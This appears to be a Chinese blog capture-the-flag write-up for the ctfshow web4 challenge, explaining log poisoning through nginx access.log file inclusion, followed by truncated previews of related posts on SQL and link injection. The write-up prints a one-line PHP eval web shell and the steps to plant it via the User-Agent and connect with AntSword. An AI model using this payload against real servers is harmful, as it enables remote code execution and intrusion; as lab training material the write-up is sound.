日誌注入漏洞

2022-02-26 21:02:38 字數 1216 閱讀 7899

靶機:ctfshow web4

1.輸入進行測試

2.檢視相應日誌檔案,在本題中檔案日誌預設位址為/var/log/nginx/access.log

(可通過抓包檢視得知伺服器為ubuntu,由nginx搭建的**,nginx的日誌檔案預設位址在/var/log/nginx/access.log和/var/log/nginx/error.log,其中本題中access.log可以開啟)

?url=/var/log/nginx/access.log,檢視檔案日誌,發現剛剛get的phpinfo存在日誌裡,且被轉義

3.重新get 並進行抓包

將這裡的%3c?php%20phpinfo();?%3e改成<?php phpinfo();?>

修改之後放包,再去檔案包含日誌檔案,發現已被執行

4.由此判斷存在日誌注入漏洞

1.輸入一句話木馬<?php @eval($_post[npfs]);?>

2.抓包將轉義後的<?php @eval($_post[npfs]);?>修改回來,放包(實際做法,如上面所述)

3.訪問日誌檔案,檢視存在一句話木馬內容,說明一句話木馬被當作php語言正常解析

4.蟻劍連線

flag在根目錄下的www的flag.txt檔案中

1.url :?url=/var/log/nginx/access.log,抓包

2.利用 user-agent 插入 payload 到日誌檔案

放包,蟻劍連線

flag在根目錄下的www的flag.txt檔案中

SQL注入漏洞

sql注入漏洞曾經是web應用程式的噩夢,cms bbs blog無一不曾受其害。sql注入的原理 以往在web應用程式訪問資料庫時一般是採取拼接字串的形式,比如登入的時候就是根據使用者名稱和密碼去查詢 string sql select top 1 from user where username...

鏈結注入漏洞

詳細描述 鏈結注入 是修改站點內容的行為,其方式為將外部站點的 url 嵌入其中,或將有易受攻擊的站點中的指令碼 的 url 嵌入其中。將 url 嵌入易受攻擊的站點中,攻擊者便能夠以它為平台來啟動對其他站點的攻擊,以及攻擊這個易受攻擊的站點本身。在這些可能的攻擊中,有些需要使用者在攻擊期間登入站點...

SQL注入漏洞

sql注入,就是通過把sql命令插入到web表單遞交或輸入網域名稱或頁面請求的查詢字串,最終達到欺騙伺服器執行惡意的sql命令,比如先前的很多影視 洩露vip會員密碼大多就是通過web表單遞交查詢字元暴出的,這類表單特別容易受到sql注入式攻擊 sql注入的發生 當應用程式使用輸入內容來構造動態sq...